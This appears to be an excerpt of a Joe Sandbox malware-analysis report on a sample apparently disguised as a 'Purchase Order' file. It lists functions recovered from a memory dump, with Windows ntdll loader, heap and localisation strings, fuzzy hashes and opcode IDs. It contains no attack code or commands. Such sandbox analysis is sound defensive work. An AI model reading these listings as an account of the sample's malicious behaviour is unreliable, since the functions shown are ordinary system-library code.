                                              • Opcode Fuzzy Hash: 75dd20ed21628c105008300de665d44333777206d14eef812cae267843286b7e
                                              • Instruction Fuzzy Hash: 48D1E5B2809315AFE721CA68C840B9BB7E8AF84754F444F2DF95497250E7B0CD4A8FD2
                                              Function 3480D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                              Download Yara Rule
                                              Strings
                                              • @, xrefs: 3480D2AF
                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3480D146
                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 3480D196
                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3480D0CF
                                              • @, xrefs: 3480D313
                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3480D262
                                              • @, xrefs: 3480D0FD
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3480D2C3
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                              • API String ID: 0-1356375266
                                              • Opcode ID: 5852f42c55c3924c44e9add2cba201fb28bce413991594922dec479bca96ca3d
                                              • Instruction ID: bb065c5eba1bbcb65966b1c0ba2f030e241dcae236bc702fa1d08c44b9170f28
                                              • Opcode Fuzzy Hash: 5852f42c55c3924c44e9add2cba201fb28bce413991594922dec479bca96ca3d
                                              • Instruction Fuzzy Hash: 6EA14D71918345EFE361CF24C840B9BB7E8BB84769F408A2EF59896250DB74D948CF53
                                              Function 3482B730 Relevance: 10.1, Strings: 7, Instructions: 1323COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$\SysWOW64$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-1558337705
                                              • Opcode ID: fb60a8fe6bb42a7cfc8926cfc57dc6894e5b51e7a4709d4882cb9f5de9acdab9
                                              • Instruction ID: 131a737b93c7e02abb79deee9d76fabe42151e088b13f0f2e1b96579d47090c2
                                              • Opcode Fuzzy Hash: fb60a8fe6bb42a7cfc8926cfc57dc6894e5b51e7a4709d4882cb9f5de9acdab9
                                              • Instruction Fuzzy Hash: 69C26BB4E017298FEB64CF18C8907AABBB5BF44344F4046EDD609AB251EB749AC1CF54
                                              Function 3480F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-523794902
                                              • Opcode ID: 95170c2eb7315c109db41e56295130b9cc91fcd7d27376f491d384a6cb3c67a7
                                              • Instruction ID: ceb61ff841771f90f49aabe3a01d7f923de18878103e1fa884d9d25d26bdd226
                                              • Opcode Fuzzy Hash: 95170c2eb7315c109db41e56295130b9cc91fcd7d27376f491d384a6cb3c67a7
                                              • Instruction Fuzzy Hash: C042D075218345EFE341CF28C880A2ABBE5FF84348F148A6DEA958B351DB74D885CF51
                                              Function 3482B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-122214566
                                              • Opcode ID: f605aec62aa3b3f85e84727dbbf497302e2768326265531ce7609bcf9991ee8d
                                              • Instruction ID: 48c13bde4d0bef802540fbb37391a59e53694815a40fb8005fc103da784183cb
                                              • Opcode Fuzzy Hash: f605aec62aa3b3f85e84727dbbf497302e2768326265531ce7609bcf9991ee8d
                                              • Instruction Fuzzy Hash: 4AC12471A01319AFEB148F6CC890BBFBBA5EF45310F544769E811AB291EBB0C9C4C391
                                              Function 34842674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                              Download Yara Rule
                                              Strings
                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 34882178
                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 34882180
                                              • SXS: %s() passed the empty activation context, xrefs: 34882165
                                              • RtlGetAssemblyStorageRoot, xrefs: 34882160, 3488219A, 348821BA
                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 348821BF
                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 3488219F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                              • API String ID: 0-861424205
                                              • Opcode ID: fffdbf601dea121a4a3d2acf18063f796ada0e38a34330cc1670ba8a5be7e66d
                                              • Instruction ID: 9d6cfc4247d024d80959f4982dd6f59aa7bb91bdd9b2a8624b7d1150afcb233a
                                              • Opcode Fuzzy Hash: fffdbf601dea121a4a3d2acf18063f796ada0e38a34330cc1670ba8a5be7e66d
                                              • Instruction Fuzzy Hash: 8E31C77AA00218BFF7118AD9CC40F9B7BB8DF55BD0F514299BA046B340D670AA01CBA1
                                              Function 34820770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-4253913091
                                              • Opcode ID: 66992d836e07cd1ce6d911c5292617bca81c958991d600147e9985c520be115b
                                              • Instruction ID: 8eb764baf1f6b0b018f4545019b5dcae2474ceb8b793eefac487fbb473eac650
                                              • Opcode Fuzzy Hash: 66992d836e07cd1ce6d911c5292617bca81c958991d600147e9985c520be115b
                                              • Instruction Fuzzy Hash: 5EF1BD74B01609DFE705CF68C890B6ABBF5FF46344F108268E6169B791DB30E981CB90
                                              Function 3483F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 3488031E
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 348802E7
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 348802BD
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              • Opcode ID: 51ef0783d3e26c579f27357e7a2fdb560960fc7f30f1c89c8399ea82731c25a4
                                              • Instruction ID: 58d59f027b76de09d0ae6e48d1706de48a0eb56cc354712a028cba7200e6d877
                                              • Opcode Fuzzy Hash: 51ef0783d3e26c579f27357e7a2fdb560960fc7f30f1c89c8399ea82731c25a4
                                              • Instruction Fuzzy Hash: 35E1AD78609741DFE715CF28C880B1AB7E4BB89364F100B6DF6A58B2E1DB74D845CB82
                                              Function 3484C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 348882E8
                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 348882DE
                                              • Failed to reallocate the system dirs string !, xrefs: 348882D7
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1783798831
                                              • Opcode ID: 6b1c6e5f1bb110c1f34fb960b1d9e25fb1ba416b222bf21aa0a2cbba0213e1ba
                                              • Instruction ID: 032bcfa7055f6c8ab4af24be603bb215472adae5e3bc38981ba68c05f85e243c
                                              • Opcode Fuzzy Hash: 6b1c6e5f1bb110c1f34fb960b1d9e25fb1ba416b222bf21aa0a2cbba0213e1ba
                                              • Instruction Fuzzy Hash: 6641ADB5559308EFF720DB68C840B4B7BECEF49750F014A2AE958A7260EBB0D841CB95
                                              Function 34894755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34894888
                                              • LdrpCheckRedirection, xrefs: 3489488F
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 34894899
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 3446177414-3154609507
                                              • Opcode ID: 61a3a0e2d922239b339f40989892d54cc174ffec44980dadd888083382d32af0
                                              • Instruction ID: 4889115dd1bba88e6272ba2b144ccc55964aa5f5a64a11e7b70dcfcde1a12177
                                              • Opcode Fuzzy Hash: 61a3a0e2d922239b339f40989892d54cc174ffec44980dadd888083382d32af0
                                              • Instruction Fuzzy Hash: 8941A176A18B599FDB11CE69C840AA67BE8EF89E90F01076DEC58EB311D731D800DB91
                                              Function 348351EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                              Download Yara Rule
                                              Strings
                                              • Kernel-MUI-Language-Allowed, xrefs: 3483527B
                                              • Kernel-MUI-Language-SKU, xrefs: 3483542B
                                              • Kernel-MUI-Language-Disallowed, xrefs: 34835352
                                              • Kernel-MUI-Number-Allowed, xrefs: 34835247
                                              • WindowsExcludedProcs, xrefs: 3483522A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: 773c708f0542312434acfe75e590eb98907516b6b0c23bad5fd318ebb525eeb5
                                              • Instruction ID: f4b9ea6d1fa6b4a6116ac204aade87903627753c713afd262c4177dfba48d86f
                                              • Opcode Fuzzy Hash: 773c708f0542312434acfe75e590eb98907516b6b0c23bad5fd318ebb525eeb5
                                              • Instruction Fuzzy Hash: 7EF14EBAD02218EFDB46CFA8C9909DEBBF9FF48654F51425AE411A7210D7709E41CBD0
                                              Function 348076B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
                                              • API String ID: 0-941669491
                                              • Opcode ID: c9f773cdc68e850ddb34474eeff4c95bcb234b39f5e15627b84e884eea6a0381
                                              • Instruction ID: 2b7dbc4f690d016a5976ae8c758e86f5426cfebd61307291e4d8d71bd4bff422
                                              • Opcode Fuzzy Hash: c9f773cdc68e850ddb34474eeff4c95bcb234b39f5e15627b84e884eea6a0381
                                              • Instruction Fuzzy Hash: C5014C36214154EFF316D39CD809FA27BD8DF42678F14825DE1114B652DAA898C1CD21
                                              Function 348104E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3481063D
                                              • kLsE, xrefs: 34810540
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                              • API String ID: 3446177414-2547482624
                                              • Opcode ID: b153ebfdabd0a3cbba3943efd133209e578cf43a9e38c1dc6779da409f2be5aa
                                              • Instruction ID: afe40bae00378bff1d5c37dc54bf8fe43a915fa415b70da52443e5c8b634d88b
                                              • Opcode Fuzzy Hash: b153ebfdabd0a3cbba3943efd133209e578cf43a9e38c1dc6779da409f2be5aa
                                              • Instruction Fuzzy Hash: E051ACB55047468FE324DF6AC940697B7E4AF86304F008A3FE9AA97A40E770D945CF92
                                              Function 3481B6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U~4
                                              • API String ID: 0-1163839511
                                              • Opcode ID: 2d03e82a65f5952b232115de7c2ac9368f3d34279a7b0ea48b3696509d942844
                                              • Instruction ID: 0d7c9a35f664e56d7bc47a660287fb4d62ec860df4509fc02922ed78a3bbbe8d
                                              • Opcode Fuzzy Hash: 2d03e82a65f5952b232115de7c2ac9368f3d34279a7b0ea48b3696509d942844
                                              • Instruction Fuzzy Hash: 32B1CC75A14708CFEB15CFA9C990B9DBBB6AF44794F144A2EE811EB380E774E840DB41
                                              Function 34848402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpInitializeProcess, xrefs: 34848422
                                              • minkernel\ntdll\ldrinit.c, xrefs: 34848421
                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3484855E
                                              • @, xrefs: 34848591
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-1918872054
                                              • Opcode ID: 1b25759099231de31fa31efcbcdc1dbfcf3d45c6baf28ecc7b4f30b1cdcdb2b1
                                              • Instruction ID: 3ca5bc19e180aa9b947a2c8383a508d481794a290ab232d8d8fb251e96f596d6
                                              • Opcode Fuzzy Hash: 1b25759099231de31fa31efcbcdc1dbfcf3d45c6baf28ecc7b4f30b1cdcdb2b1
                                              • Instruction Fuzzy Hash: AF917C75508348EFE721DF64CC40EABB6E8FB84794F804E2EFA8496250E774D9448F62
                                              Function 3484273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                              Download Yara Rule
                                              Strings
                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 348822B6
                                              • .Local, xrefs: 348428D8
                                              • SXS: %s() passed the empty activation context, xrefs: 348821DE
                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 348821D9, 348822B1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                              • API String ID: 0-1239276146
                                              • Opcode ID: 6b3af6d9a2f2dc8e939a5acff0ba9f069ee8935414d8fbce0cdc6baa2f7f195d
                                              • Instruction ID: fb72af8439b8627e9c471e104431a681f15a789c40eb192308ccf5f8ecc69b4f
                                              • Opcode Fuzzy Hash: 6b3af6d9a2f2dc8e939a5acff0ba9f069ee8935414d8fbce0cdc6baa2f7f195d
                                              • Instruction Fuzzy Hash: F0A19E75A0422DDFEB25CFA4D884B99B7B5BF58354F1106EAD808AB351DB709E80CF90
                                              Function 348164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                              Download Yara Rule
                                              Strings
                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 34870FE5
                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 34871028
                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 3487106B
                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 348710AE
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                              • API String ID: 0-1468400865
                                              • Opcode ID: 05db6d7d93418b62665b88e332e285a6749427f28ef2743b2b9bea2c55b3075e
                                              • Instruction ID: 165b2216651fc6812040cada8d2144bae26fcf125623893bb19e46c406338af9
                                              • Opcode Fuzzy Hash: 05db6d7d93418b62665b88e332e285a6749427f28ef2743b2b9bea2c55b3075e
                                              • Instruction Fuzzy Hash: FF71F1B1904304DFEB50DF18C884B877FA8AF547A4F400A69F9998B296D774D588CFD2
                                              Function 3480F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                              • API String ID: 0-2586055223
                                              • Opcode ID: 96c4b42045f5dcf7042e00c436e4eaa9a6ccec0690d55ee8f59137dc43f061ec
                                              • Instruction ID: 1587d84b480906961c0c4ad850581ea68fc716e152d7bd056455ff6de6657a67
                                              • Opcode Fuzzy Hash: 96c4b42045f5dcf7042e00c436e4eaa9a6ccec0690d55ee8f59137dc43f061ec
                                              • Instruction Fuzzy Hash: C0613372204784EFE311CB68CC44F6777E9EF84758F048669FA658B291DBB8D841CB62
                                              Function 348C11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                              • API String ID: 2994545307-336120773
                                              • Opcode ID: 6d1eb02b3bf32ab389ebe234347e9044b67a83054a9f2069836f99fe3d2939df
